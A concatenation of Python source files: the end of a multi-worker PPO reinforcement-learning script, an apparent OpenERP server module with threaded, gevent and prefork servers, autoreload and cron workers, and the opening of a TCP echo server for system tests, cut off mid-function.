if not ROLLING_EVENT.is_set(): # while global PPO is updating
ROLLING_EVENT.wait() # wait until PPO is updated
buffer_s, buffer_a, buffer_r = [], [], [] # clear history buffer, use new policy to collect data
a = self.ppo.choose_action(s)
s_, r, done, _ = self.env.step(a)
buffer_s.append(s)
buffer_a.append(a)
buffer_r.append((r + 8) / 8) # normalize reward, find to be useful
s = s_
ep_r += r
GLOBAL_UPDATE_COUNTER += 1 # count to minimum batch size, no need to wait other workers
if t == EP_LEN - 1 or GLOBAL_UPDATE_COUNTER >= MIN_BATCH_SIZE:
v_s_ = self.ppo.get_v(s_)
discounted_r = [] # compute discounted reward
for r in buffer_r[::-1]:
v_s_ = r + GAMMA * v_s_
discounted_r.append(v_s_)
discounted_r.reverse()
bs, ba, br = np.vstack(buffer_s), np.vstack(buffer_a), np.array(discounted_r)[:, np.newaxis]
buffer_s, buffer_a, buffer_r = [], [], []
QUEUE.put(np.hstack((bs, ba, br))) # put data in the queue
if GLOBAL_UPDATE_COUNTER >= MIN_BATCH_SIZE:
ROLLING_EVENT.clear() # stop collecting data
UPDATE_EVENT.set() # globalPPO update
if GLOBAL_EP >= EP_MAX: # stop training
COORD.request_stop()
break
# record reward changes, plot later
if len(GLOBAL_RUNNING_R) == 0: GLOBAL_RUNNING_R.append(ep_r)
else: GLOBAL_RUNNING_R.append(GLOBAL_RUNNING_R[-1]*0.9+ep_r*0.1)
GLOBAL_EP += 1
print('{0:.1f}%'.format(GLOBAL_EP/EP_MAX*100), '|W%i' % self.wid, '|Ep_r: %.2f' % ep_r,)
if __name__ == '__main__':
GLOBAL_PPO = PPO()
UPDATE_EVENT, ROLLING_EVENT = threading.Event(), threading.Event()
UPDATE_EVENT.clear() # not update now
ROLLING_EVENT.set() # start to roll out
workers = [Worker(wid=i) for i in range(N_WORKER)]
GLOBAL_UPDATE_COUNTER, GLOBAL_EP = 0, 0
GLOBAL_RUNNING_R = []
COORD = tf.train.Coordinator()
QUEUE = queue.Queue() # workers putting data in this queue
threads = []
for worker in workers: # worker threads
t = threading.Thread(target=worker.work, args=())
t.start() # training
threads.append(t)
# add a PPO updating thread
threads.append(threading.Thread(target=GLOBAL_PPO.update,))
threads[-1].start()
COORD.join(threads)
# plot reward change and test
plt.plot(np.arange(len(GLOBAL_RUNNING_R)), GLOBAL_RUNNING_R)
plt.xlabel('Episode'); plt.ylabel('Moving reward'); plt.ion(); plt.show()
env = gym.make('Pendulum-v0')
while True:
s = env.reset()
for t in range(300):
env.render()
s = env.step(GLOBAL_PPO.choose_action(s))[0]
|
server.py
|
#-----------------------------------------------------------
# Threaded, Gevent and Prefork Servers
#-----------------------------------------------------------
import datetime
import errno
import logging
import os
import os.path
import platform
import psutil
import random
if os.name == 'posix':
import resource
else:
resource = None
import select
import signal
import socket
import subprocess
import sys
import threading
import time
import unittest2
import werkzeug.serving
try:
import fcntl
except ImportError:
pass
try:
from setproctitle import setproctitle
except ImportError:
setproctitle = lambda x: None
import openerp
from openerp.modules.registry import RegistryManager
from openerp.release import nt_service_name
import openerp.tools.config as config
from openerp.tools.misc import stripped_sys_argv, dumpstacks
_logger = logging.getLogger(__name__)
SLEEP_INTERVAL = 60 # 1 min
#----------------------------------------------------------
# Werkzeug WSGI servers patched
#----------------------------------------------------------
class LoggingBaseWSGIServerMixIn(object):
def handle_error(self, request, client_address):
t, e, _ = sys.exc_info()
if t == socket.error and e.errno == errno.EPIPE:
# broken pipe, ignore error
return
_logger.exception('Exception happened during processing of request from %s', client_address)
class BaseWSGIServerNoBind(LoggingBaseWSGIServerMixIn, werkzeug.serving.BaseWSGIServer):
""" werkzeug Base WSGI Server patched to skip socket binding. PreforkServer
use this class, sets the socket and calls the process_request() manually
"""
def __init__(self, app):
werkzeug.serving.BaseWSGIServer.__init__(self, "1", "1", app)
def server_bind(self):
# we dont bind beause we use the listen socket of PreforkServer#socket
# instead we close the socket
if self.socket:
self.socket.close()
def server_activate(self):
# dont listen as we use PreforkServer#socket
pass
class RequestHandler(werkzeug.serving.WSGIRequestHandler):
def setup(self):
# flag the current thread as handling a http request
super(RequestHandler, self).setup()
me = threading.currentThread()
me.name = 'openerp.service.http.request.%s' % (me.ident,)
# _reexec() should set LISTEN_* to avoid connection refused during reload time. It
# should also work with systemd socket activation. This is currently untested
# and not yet used.
class ThreadedWSGIServerReloadable(LoggingBaseWSGIServerMixIn, werkzeug.serving.ThreadedWSGIServer):
""" werkzeug Threaded WSGI Server patched to allow reusing a listen socket
given by the environement, this is used by autoreload to keep the listen
socket open when a reload happens.
"""
def __init__(self, host, port, app):
super(ThreadedWSGIServerReloadable, self).__init__(host, port, app,
handler=RequestHandler)
def server_bind(self):
envfd = os.environ.get('LISTEN_FDS')
if envfd and os.environ.get('LISTEN_PID') == str(os.getpid()):
self.reload_socket = True
self.socket = socket.fromfd(int(envfd), socket.AF_INET, socket.SOCK_STREAM)
# should we os.close(int(envfd)) ? it seem python duplicate the fd.
else:
self.reload_socket = False
super(ThreadedWSGIServerReloadable, self).server_bind()
def server_activate(self):
if not self.reload_socket:
super(ThreadedWSGIServerReloadable, self).server_activate()
#----------------------------------------------------------
# AutoReload watcher
#----------------------------------------------------------
class AutoReload(object):
def __init__(self, server):
self.server = server
self.files = {}
self.modules = {}
import pyinotify
class EventHandler(pyinotify.ProcessEvent):
def __init__(self, autoreload):
self.autoreload = autoreload
def process_IN_CREATE(self, event):
_logger.debug('File created: %s', event.pathname)
self.autoreload.files[event.pathname] = 1
def process_IN_MODIFY(self, event):
_logger.debug('File modified: %s', event.pathname)
self.autoreload.files[event.pathname] = 1
self.wm = pyinotify.WatchManager()
self.handler = EventHandler(self)
self.notifier = pyinotify.Notifier(self.wm, self.handler, timeout=0)
mask = pyinotify.IN_MODIFY | pyinotify.IN_CREATE # IN_MOVED_FROM, IN_MOVED_TO ?
for path in openerp.modules.module.ad_paths:
_logger.info('Watching addons folder %s', path)
self.wm.add_watch(path, mask, rec=True)
def process_data(self, files):
xml_files = [i for i in files if i.endswith('.xml')]
for i in xml_files:
for path in openerp.modules.module.ad_paths:
if i.startswith(path):
# find out wich addons path the file belongs to
# and extract it's module name
right = i[len(path) + 1:].split('/')
if len(right) < 2:
continue
module = right[0]
self.modules[module] = 1
if self.modules:
_logger.info('autoreload: xml change detected, autoreload activated')
restart()
def process_python(self, files):
# process python changes
py_files = [i for i in files if i.endswith('.py')]
py_errors = []
# TODO keep python errors until they are ok
if py_files:
for i in py_files:
try:
source = open(i, 'rb').read() + '\n'
compile(source, i, 'exec')
except SyntaxError:
py_errors.append(i)
if py_errors:
_logger.info('autoreload: python code change detected, errors found')
for i in py_errors:
_logger.info('autoreload: SyntaxError %s', i)
else:
_logger.info('autoreload: python code updated, autoreload activated')
restart()
def check_thread(self):
# Check if some files have been touched in the addons path.
# If true, check if the touched file belongs to an installed module
# in any of the database used in the registry manager.
while 1:
while self.notifier.check_events(1000):
self.notifier.read_events()
self.notifier.process_events()
l = self.files.keys()
self.files.clear()
self.process_data(l)
self.process_python(l)
def run(self):
t = threading.Thread(target=self.check_thread)
t.setDaemon(True)
t.start()
_logger.info('AutoReload watcher running')
#----------------------------------------------------------
# Servers: Threaded, Gevented and Prefork
#----------------------------------------------------------
class CommonServer(object):
def __init__(self, app):
# TODO Change the xmlrpc_* options to http_*
self.app = app
# config
self.interface = config['xmlrpc_interface'] or '0.0.0.0'
self.port = config['xmlrpc_port']
# runtime
self.pid = os.getpid()
def close_socket(self, sock):
""" Closes a socket instance cleanly
:param sock: the network socket to close
:type sock: socket.socket
"""
try:
sock.shutdown(socket.SHUT_RDWR)
except socket.error, e:
# On OSX, socket shutdowns both sides if any side closes it
# causing an error 57 'Socket is not connected' on shutdown
# of the other side (or something), see
# http://bugs.python.org/issue4397
# note: stdlib fixed test, not behavior
if e.errno != errno.ENOTCONN or platform.system() not in ['Darwin', 'Windows']:
raise
sock.close()
class ThreadedServer(CommonServer):
def __init__(self, app):
super(ThreadedServer, self).__init__(app)
self.main_thread_id = threading.currentThread().ident
# Variable keeping track of the number of calls to the signal handler defined
# below. This variable is monitored by ``quit_on_signals()``.
self.quit_signals_received = 0
#self.socket = None
self.httpd = None
def signal_handler(self, sig, frame):
if sig in [signal.SIGINT, signal.SIGTERM]:
# shutdown on kill -INT or -TERM
self.quit_signals_received += 1
if self.quit_signals_received > 1:
# logging.shutdown was already called at this point.
sys.stderr.write("Forced shutdown.\n")
os._exit(0)
elif sig == signal.SIGHUP:
# restart on kill -HUP
openerp.phoenix = True
self.quit_signals_received += 1
def cron_thread(self, number):
while True:
time.sleep(SLEEP_INTERVAL + number) # Steve Reich timing style
registries = openerp.modules.registry.RegistryManager.registries
_logger.debug('cron%d polling for jobs', number)
for db_name, registry in registries.items():
while True and registry.ready:
acquired = openerp.addons.base.ir.ir_cron.ir_cron._acquire_job(db_name)
if not acquired:
break
def cron_spawn(self):
""" Start the above runner function in a daemon thread.
The thread is a typical daemon thread: it will never quit and must be
terminated when the main process exits - with no consequence (the processing
threads it spawns are not marked daemon).
"""
# Force call to strptime just before starting the cron thread
# to prevent time.strptime AttributeError within the thread.
# See: http://bugs.python.org/issue7980
datetime.datetime.strptime('2012-01-01', '%Y-%m-%d')
for i in range(openerp.tools.config['max_cron_threads']):
def target():
self.cron_thread(i)
t = threading.Thread(target=target, name="openerp.service.cron.cron%d" % i)
t.setDaemon(True)
t.start()
_logger.debug("cron%d started!" % i)
def http_thread(self):
def app(e, s):
return self.app(e, s)
self.httpd = ThreadedWSGIServerReloadable(self.interface, self.port, app)
self.httpd.serve_forever()
def http_spawn(self):
t = threading.Thread(target=self.http_thread, name="openerp.service.httpd")
t.setDaemon(True)
t.start()
_logger.info('HTTP service (werkzeug) running on %s:%s', self.interface, self.port)
def start(self, stop=False):
_logger.debug("Setting signal handlers")
if os.name == 'posix':
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGTERM, self.signal_handler)
signal.signal(signal.SIGCHLD, self.signal_handler)
signal.signal(signal.SIGHUP, self.signal_handler)
signal.signal(signal.SIGQUIT, dumpstacks)
elif os.name == 'nt':
import win32api
win32api.SetConsoleCtrlHandler(lambda sig: self.signal_handler(sig, None), 1)
test_mode = config['test_enable'] or config['test_file']
if not stop or test_mode:
# some tests need the http deamon to be available...
self.http_spawn()
if not stop:
# only relevant if we are not in "--stop-after-init" mode
self.cron_spawn()
def stop(self):
""" Shutdown the WSGI server. Wait for non deamon threads.
"""
_logger.info("Initiating shutdown")
_logger.info("Hit CTRL-C again or send a second signal to force the shutdown.")
if self.httpd:
self.httpd.shutdown()
self.close_socket(self.httpd.socket)
# Manually join() all threads before calling sys.exit() to allow a second signal
# to trigger _force_quit() in case some non-daemon threads won't exit cleanly.
# threading.Thread.join() should not mask signals (at least in python 2.5).
me = threading.currentThread()
_logger.debug('current thread: %r', me)
for thread in threading.enumerate():
_logger.debug('process %r (%r)', thread, thread.isDaemon())
if thread != me and not thread.isDaemon() and thread.ident != self.main_thread_id:
while thread.isAlive():
_logger.debug('join and sleep')
# Need a busyloop here as thread.join() masks signals
# and would prevent the forced shutdown.
thread.join(0.05)
time.sleep(0.05)
_logger.debug('--')
openerp.modules.registry.RegistryManager.delete_all()
logging.shutdown()
def run(self, preload=None, stop=False):
""" Start the http server and the cron thread then wait for a signal.
The first SIGINT or SIGTERM signal will initiate a graceful shutdown while
a second one if any will force an immediate exit.
"""
self.start(stop=stop)
rc = preload_registries(preload)
if stop:
self.stop()
return rc
# Wait for a first signal to be handled. (time.sleep will be interrupted
# by the signal handler.) The try/except is for the win32 case.
try:
while self.quit_signals_received == 0:
time.sleep(60)
except KeyboardInterrupt:
pass
self.stop()
def reload(self):
os.kill(self.pid, signal.SIGHUP)
class GeventServer(CommonServer):
def __init__(self, app):
super(GeventServer, self).__init__(app)
self.port = config['longpolling_port']
self.httpd = None
def watch_parent(self, beat=4):
import gevent
ppid = os.getppid()
while True:
if ppid != os.getppid():
pid = os.getpid()
_logger.info("LongPolling (%s) Parent changed", pid)
# suicide !!
os.kill(pid, signal.SIGTERM)
return
gevent.sleep(beat)
def start(self):
import gevent
from gevent.wsgi import WSGIServer
if os.name == 'posix':
signal.signal(signal.SIGQUIT, dumpstacks)
gevent.spawn(self.watch_parent)
self.httpd = WSGIServer((self.interface, self.port), self.app)
_logger.info('Evented Service (longpolling) running on %s:%s', self.interface, self.port)
self.httpd.serve_forever()
def stop(self):
import gevent
self.httpd.stop()
gevent.shutdown()
def run(self, preload, stop):
self.start()
self.stop()
class PreforkServer(CommonServer):
""" Multiprocessing inspired by (g)unicorn.
PreforkServer (aka Multicorn) currently uses accept(2) as dispatching
method between workers but we plan to replace it by a more intelligent
dispatcher to will parse the first HTTP request line.
"""
def __init__(self, app):
# config
self.address = (config['xmlrpc_interface'] or '0.0.0.0', config['xmlrpc_port'])
self.population = config['workers']
self.timeout = config['limit_time_real']
self.limit_request = config['limit_request']
# working vars
self.beat = 4
self.app = app
self.pid = os.getpid()
self.socket = None
self.workers_http = {}
self.workers_cron = {}
self.workers = {}
self.generation = 0
self.queue = []
self.long_polling_pid = None
def pipe_new(self):
pipe = os.pipe()
for fd in pipe:
# non_blocking
flags = fcntl.fcntl(fd, fcntl.F_GETFL) | os.O_NONBLOCK
fcntl.fcntl(fd, fcntl.F_SETFL, flags)
# close_on_exec
flags = fcntl.fcntl(fd, fcntl.F_GETFD) | fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
return pipe
def pipe_ping(self, pipe):
try:
os.write(pipe[1], '.')
except IOError, e:
if e.errno not in [errno.EAGAIN, errno.EINTR]:
raise
def signal_handler(self, sig, frame):
if len(self.queue) < 5 or sig == signal.SIGCHLD:
self.queue.append(sig)
self.pipe_ping(self.pipe)
else:
_logger.warn("Dropping signal: %s", sig)
def worker_spawn(self, klass, workers_registry):
self.generation += 1
worker = klass(self)
pid = os.fork()
if pid != 0:
worker.pid = pid
self.workers[pid] = worker
workers_registry[pid] = worker
return worker
else:
worker.run()
sys.exit(0)
def long_polling_spawn(self):
nargs = stripped_sys_argv()
cmd = nargs[0]
cmd = os.path.join(os.path.dirname(cmd), "openerp-gevent")
nargs[0] = cmd
popen = subprocess.Popen([sys.executable] + nargs)
self.long_polling_pid = popen.pid
def worker_pop(self, pid):
if pid in self.workers:
_logger.debug("Worker (%s) unregistered", pid)
try:
self.workers_http.pop(pid, None)
self.workers_cron.pop(pid, None)
u = self.workers.pop(pid)
u.close()
except OSError:
return
def worker_kill(self, pid, sig):
try:
os.kill(pid, sig)
except OSError, e:
if e.errno == errno.ESRCH:
self.worker_pop(pid)
def process_signals(self):
while len(self.queue):
sig = self.queue.pop(0)
if sig in [signal.SIGINT, signal.SIGTERM]:
raise KeyboardInterrupt
elif sig == signal.SIGHUP:
# restart on kill -HUP
openerp.phoenix = True
raise KeyboardInterrupt
elif sig == signal.SIGQUIT:
# dump stacks on kill -3
self.dumpstacks()
elif sig == signal.SIGTTIN:
# increase number of workers
self.population += 1
elif sig == signal.SIGTTOU:
# decrease number of workers
self.population -= 1
def process_zombie(self):
# reap dead workers
while 1:
try:
wpid, status = os.waitpid(-1, os.WNOHANG)
if not wpid:
break
if (status >> 8) == 3:
msg = "Critial worker error (%s)"
_logger.critical(msg, wpid)
raise Exception(msg % wpid)
self.worker_pop(wpid)
except OSError, e:
if e.errno == errno.ECHILD:
break
raise
def process_timeout(self):
now = time.time()
for (pid, worker) in self.workers.items():
if worker.watchdog_timeout is not None and \
(now - worker.watchdog_time) >= worker.watchdog_timeout:
_logger.error("Worker (%s) timeout", pid)
self.worker_kill(pid, signal.SIGKILL)
def process_spawn(self):
while len(self.workers_http) < self.population:
self.worker_spawn(WorkerHTTP, self.workers_http)
while len(self.workers_cron) < config['max_cron_threads']:
self.worker_spawn(WorkerCron, self.workers_cron)
if not self.long_polling_pid:
self.long_polling_spawn()
def sleep(self):
try:
# map of fd -> worker
fds = dict([(w.watchdog_pipe[0], w) for k, w in self.workers.items()])
fd_in = fds.keys() + [self.pipe[0]]
# check for ping or internal wakeups
ready = select.select(fd_in, [], [], self.beat)
# update worker watchdogs
for fd in ready[0]:
if fd in fds:
fds[fd].watchdog_time = time.time()
try:
# empty pipe
while os.read(fd, 1):
pass
except OSError, e:
if e.errno not in [errno.EAGAIN]:
raise
except select.error, e:
if e[0] not in [errno.EINTR]:
raise
def start(self):
# wakeup pipe, python doesnt throw EINTR when a syscall is interrupted
# by a signal simulating a pseudo SA_RESTART. We write to a pipe in the
# signal handler to overcome this behaviour
self.pipe = self.pipe_new()
# set signal handlers
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGTERM, self.signal_handler)
signal.signal(signal.SIGHUP, self.signal_handler)
signal.signal(signal.SIGCHLD, self.signal_handler)
signal.signal(signal.SIGTTIN, self.signal_handler)
signal.signal(signal.SIGTTOU, self.signal_handler)
signal.signal(signal.SIGQUIT, dumpstacks)
# listen to socket
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.setblocking(0)
self.socket.bind(self.address)
self.socket.listen(8 * self.population)
def stop(self, graceful=True):
if self.long_polling_pid is not None:
# FIXME make longpolling process handle SIGTERM correctly
self.worker_kill(self.long_polling_pid, signal.SIGKILL)
self.long_polling_pid = None
if graceful:
_logger.info("Stopping gracefully")
limit = time.time() + self.timeout
for pid in self.workers.keys():
self.worker_kill(pid, signal.SIGTERM)
while self.workers and time.time() < limit:
self.process_zombie()
time.sleep(0.1)
else:
_logger.info("Stopping forcefully")
for pid in self.workers.keys():
self.worker_kill(pid, signal.SIGTERM)
self.socket.close()
def run(self, preload, stop):
self.start()
rc = preload_registries(preload)
if stop:
self.stop()
return rc
# Empty the cursor pool, we dont want them to be shared among forked workers.
openerp.sql_db.close_all()
_logger.debug("Multiprocess starting")
while 1:
try:
#_logger.debug("Multiprocess beat (%s)",time.time())
self.process_signals()
self.process_zombie()
self.process_timeout()
self.process_spawn()
self.sleep()
except KeyboardInterrupt:
_logger.debug("Multiprocess clean stop")
self.stop()
break
except Exception, e:
_logger.exception(e)
self.stop(False)
return -1
class Worker(object):
""" Workers """
def __init__(self, multi):
self.multi = multi
self.watchdog_time = time.time()
self.watchdog_pipe = multi.pipe_new()
# Can be set to None if no watchdog is desired.
self.watchdog_timeout = multi.timeout
self.ppid = os.getpid()
self.pid = None
self.alive = True
# should we rename into lifetime ?
self.request_max = multi.limit_request
self.request_count = 0
def setproctitle(self, title=""):
setproctitle('openerp: %s %s %s' % (self.__class__.__name__, self.pid, title))
def close(self):
os.close(self.watchdog_pipe[0])
os.close(self.watchdog_pipe[1])
def signal_handler(self, sig, frame):
self.alive = False
def sleep(self):
try:
select.select([self.multi.socket], [], [], self.multi.beat)
except select.error, e:
if e[0] not in [errno.EINTR]:
raise
def process_limit(self):
if resource is None:
return
# If our parent changed sucide
if self.ppid != os.getppid():
_logger.info("Worker (%s) Parent changed", self.pid)
self.alive = False
# check for lifetime
if self.request_count >= self.request_max:
_logger.info("Worker (%d) max request (%s) reached.", self.pid, self.request_count)
self.alive = False
# Reset the worker if it consumes too much memory (e.g. caused by a memory leak).
rss, vms = psutil.Process(os.getpid()).get_memory_info()
if vms > config['limit_memory_soft']:
_logger.info('Worker (%d) virtual memory limit (%s) reached.', self.pid, vms)
self.alive = False # Commit suicide after the request.
# VMS and RLIMIT_AS are the same thing: virtual memory, a.k.a. address space
soft, hard = resource.getrlimit(resource.RLIMIT_AS)
resource.setrlimit(resource.RLIMIT_AS, (config['limit_memory_hard'], hard))
# SIGXCPU (exceeded CPU time) signal handler will raise an exception.
r = resource.getrusage(resource.RUSAGE_SELF)
cpu_time = r.ru_utime + r.ru_stime
def time_expired(n, stack):
_logger.info('Worker (%d) CPU time limit (%s) reached.', config['limit_time_cpu'])
# We dont suicide in such case
raise Exception('CPU time limit exceeded.')
signal.signal(signal.SIGXCPU, time_expired)
soft, hard = resource.getrlimit(resource.RLIMIT_CPU)
resource.setrlimit(resource.RLIMIT_CPU, (cpu_time + config['limit_time_cpu'], hard))
def process_work(self):
pass
def start(self):
self.pid = os.getpid()
self.setproctitle()
_logger.info("Worker %s (%s) alive", self.__class__.__name__, self.pid)
# Reseed the random number generator
random.seed()
# Prevent fd inherientence close_on_exec
flags = fcntl.fcntl(self.multi.socket, fcntl.F_GETFD) | fcntl.FD_CLOEXEC
fcntl.fcntl(self.multi.socket, fcntl.F_SETFD, flags)
# reset blocking status
self.multi.socket.setblocking(0)
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGTERM, signal.SIG_DFL)
signal.signal(signal.SIGCHLD, signal.SIG_DFL)
def stop(self):
pass
def run(self):
try:
self.start()
while self.alive:
self.process_limit()
self.multi.pipe_ping(self.watchdog_pipe)
self.sleep()
self.process_work()
_logger.info("Worker (%s) exiting. request_count: %s.", self.pid, self.request_count)
self.stop()
except Exception:
_logger.exception("Worker (%s) Exception occured, exiting..." % self.pid)
# should we use 3 to abort everything ?
sys.exit(1)
class WorkerHTTP(Worker):
""" HTTP Request workers """
def process_request(self, client, addr):
client.setblocking(1)
client.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
# Prevent fd inherientence close_on_exec
flags = fcntl.fcntl(client, fcntl.F_GETFD) | fcntl.FD_CLOEXEC
fcntl.fcntl(client, fcntl.F_SETFD, flags)
# do request using BaseWSGIServerNoBind monkey patched with socket
self.server.socket = client
# tolerate broken pipe when the http client closes the socket before
# receiving the full reply
try:
self.server.process_request(client, addr)
except IOError, e:
if e.errno != errno.EPIPE:
raise
self.request_count += 1
def process_work(self):
try:
client, addr = self.multi.socket.accept()
self.process_request(client, addr)
except socket.error, e:
if e[0] not in (errno.EAGAIN, errno.ECONNABORTED):
raise
def start(self):
Worker.start(self)
self.server = BaseWSGIServerNoBind(self.multi.app)
class WorkerCron(Worker):
""" Cron workers """
def __init__(self, multi):
super(WorkerCron, self).__init__(multi)
# process_work() below process a single database per call.
# The variable db_index is keeping track of the next database to
# process.
self.db_index = 0
def sleep(self):
# Really sleep once all the databases have been processed.
if self.db_index == 0:
interval = SLEEP_INTERVAL + self.pid % 10 # chorus effect
time.sleep(interval)
def _db_list(self):
if config['db_name']:
db_names = config['db_name'].split(',')
else:
db_names = openerp.service.db.exp_list(True)
return db_names
def process_work(self):
rpc_request = logging.getLogger('openerp.netsvc.rpc.request')
rpc_request_flag = rpc_request.isEnabledFor(logging.DEBUG)
_logger.debug("WorkerCron (%s) polling for jobs", self.pid)
db_names = self._db_list()
if len(db_names):
self.db_index = (self.db_index + 1) % len(db_names)
db_name = db_names[self.db_index]
self.setproctitle(db_name)
if rpc_request_flag:
start_time = time.time()
start_rss, start_vms = psutil.Process(os.getpid()).get_memory_info()
import openerp.addons.base as base
base.ir.ir_cron.ir_cron._acquire_job(db_name)
openerp.modules.registry.RegistryManager.delete(db_name)
# dont keep cursors in multi database mode
if len(db_names) > 1:
openerp.sql_db.close_db(db_name)
if rpc_request_flag:
run_time = time.time() - start_time
end_rss, end_vms = psutil.Process(os.getpid()).get_memory_info()
vms_diff = (end_vms - start_vms) / 1024
logline = '%s time:%.3fs mem: %sk -> %sk (diff: %sk)' % \
(db_name, run_time, start_vms / 1024, end_vms / 1024, vms_diff)
_logger.debug("WorkerCron (%s) %s", self.pid, logline)
self.request_count += 1
if self.request_count >= self.request_max and self.request_max < len(db_names):
_logger.error("There are more dabatases to process than allowed "
"by the `limit_request` configuration variable: %s more.",
len(db_names) - self.request_max)
else:
self.db_index = 0
def start(self):
os.nice(10) # mommy always told me to be nice with others...
Worker.start(self)
self.multi.socket.close()
#----------------------------------------------------------
# start/stop public api
#----------------------------------------------------------
server = None
def load_server_wide_modules():
for m in openerp.conf.server_wide_modules:
try:
openerp.modules.module.load_openerp_module(m)
except Exception:
msg = ''
if m == 'web':
msg = """
The `web` module is provided by the addons found in the `openerp-web` project.
Maybe you forgot to add those addons in your addons_path configuration."""
_logger.exception('Failed to load server-wide module `%s`.%s', m, msg)
def _reexec(updated_modules=None):
"""reexecute openerp-server process with (nearly) the same arguments"""
if openerp.tools.osutil.is_running_as_nt_service():
subprocess.call('net stop {0} && net start {0}'.format(nt_service_name), shell=True)
exe = os.path.basename(sys.executable)
args = stripped_sys_argv()
args += ["-u", ','.join(updated_modules)]
if not args or args[0] != exe:
args.insert(0, exe)
os.execv(sys.executable, args)
def load_test_file_yml(registry, test_file):
with registry.cursor() as cr:
openerp.tools.convert_yaml_import(cr, 'base', file(test_file), 'test', {}, 'init')
if config['test_commit']:
_logger.info('test %s has been commited', test_file)
cr.commit()
else:
_logger.info('test %s has been rollbacked', test_file)
cr.rollback()
def load_test_file_py(registry, test_file):
# Locate python module based on its filename and run the tests
test_path, _ = os.path.splitext(os.path.abspath(test_file))
for mod_name, mod_mod in sys.modules.items():
if mod_mod:
mod_path, _ = os.path.splitext(getattr(mod_mod, '__file__', ''))
if test_path == mod_path:
suite = unittest2.TestSuite()
for t in unittest2.TestLoader().loadTestsFromModule(mod_mod):
suite.addTest(t)
_logger.log(logging.INFO, 'running tests %s.', mod_mod.__name__)
stream = openerp.modules.module.TestStream()
result = unittest2.TextTestRunner(verbosity=2, stream=stream).run(suite)
success = result.wasSuccessful()
if hasattr(registry._assertion_report,'report_result'):
registry._assertion_report.report_result(success)
if not success:
_logger.error('%s: at least one error occurred in a test', test_file)
def preload_registries(dbnames):
""" Preload a registries, possibly run a test file."""
# TODO: move all config checks to args dont check tools.config here
config = openerp.tools.config
test_file = config['test_file']
dbnames = dbnames or []
rc = 0
for dbname in dbnames:
try:
update_module = config['init'] or config['update']
registry = RegistryManager.new(dbname, update_module=update_module)
# run test_file if provided
if test_file:
_logger.info('loading test file %s', test_file)
if test_file.endswith('yml'):
load_test_file_yml(registry, test_file)
elif test_file.endswith('py'):
load_test_file_py(registry, test_file)
if registry._assertion_report.failures:
rc += 1
except Exception:
_logger.critical('Failed to initialize database `%s`.', dbname, exc_info=True)
return -1
return rc
def start(preload=None, stop=False):
""" Start the openerp http server and cron processor.
"""
global server
load_server_wide_modules()
if openerp.evented:
server = GeventServer(openerp.service.wsgi_server.application)
elif config['workers']:
server = PreforkServer(openerp.service.wsgi_server.application)
else:
server = ThreadedServer(openerp.service.wsgi_server.application)
if config['auto_reload']:
autoreload = AutoReload(server)
autoreload.run()
rc = server.run(preload, stop)
# like the legend of the phoenix, all ends with beginnings
if getattr(openerp, 'phoenix', False):
modules = []
if config['auto_reload']:
modules = autoreload.modules.keys()
_reexec(modules)
return rc if rc else 0
def restart():
""" Restart the server
"""
if os.name == 'nt':
# run in a thread to let the current thread return response to the caller.
threading.Thread(target=_reexec).start()
else:
os.kill(server.pid, signal.SIGHUP)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
TCP_echo_server.py
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
import argparse
import selectors
import signal
import socket
import sys
import time
import traceback
from threading import Thread
from system_test import Logger
from system_test import TIMEOUT
class ClientRecord(object):
"""
Object to register with the selector 'data' field
for incoming user connections. This is *not* used
for the listening socket.
This object holds the socketId in the address and
the inbound and outbound data list buffers for this
socket's payload.
"""
def __init__(self, address):
self.addr = address
self.inb = b''
self.outb = b''
def __repr__(self):
return str(self.addr) + " len(in)=" + str(len(self.inb)) + " len(out)=" + str(len(self.outb))
def __str__(self):
return self.__repr__()
class GracefulExitSignaler:
kill_now = False
def __init__(self):
signal.signal(signal.SIGINT, self.exit_gracefully)
signal.signal(signal.SIGTERM, self.exit_gracefully)
def exit_gracefully(self, signum, frame):
self.kill_now = True
def split_chunk_for_display(raw_bytes):
"""
Given some raw bytes, return a display string
Only show the beginning and end of largish (2x CONTENT_CHUNK_SIZE) arrays.
:param raw_bytes:
:return: display string
"""
CONTENT_CHUNK_SIZE = 50 # Content repeats after chunks this big - used by echo client, too
if len(raw_bytes) > 2 * CONTENT_CHUNK_SIZE:
result = repr(raw_bytes[:CONTENT_CHUNK_SIZE]) + " ... " + repr(raw_bytes[-CONTENT_CHUNK_SIZE:])
else:
result = repr(raw_bytes)
return result
class TcpEchoServer:
def __init__(self, prefix="ECHO_SERVER", port="0", echo_count=0, timeout=0.0, logger=None,
conn_stall=0.0, close_on_conn=False, close_on_data=False):
"""
Start echo server in separate thread
:param prefix: log prefix
:param port: port to listen on
:param echo_count: exit after echoing this many bytes
:param timeout: exit after this many seconds
:param logger: Logger() object
:return:
"""
self.sock = None
self.prefix = prefix
self.port = int(port)
self.echo_count = echo_count
self.timeout = timeout
self.logger = logger
self.conn_stall = conn_stall
self.close_on_conn = close_on_conn
self.close_on_data = close_on_data
self.keep_running = True
self.HOST = '127.0.0.1'
self.is_running = False
self.exit_status = None
self.error = None
self._thread = Thread(target=self.run)
self._thread.daemon = True
self._thread.start()
def run(self):
"""
Run server in daemon thread.
A single thread runs multiple sockets through selectors.
Note that timeouts and such are done in line and processing stops for
all sockets when one socket is timing out. For the intended one-at-a-time
test cases this works but it is not general solution for all cases.
:return:
"""
try:
# set up spontaneous exit settings
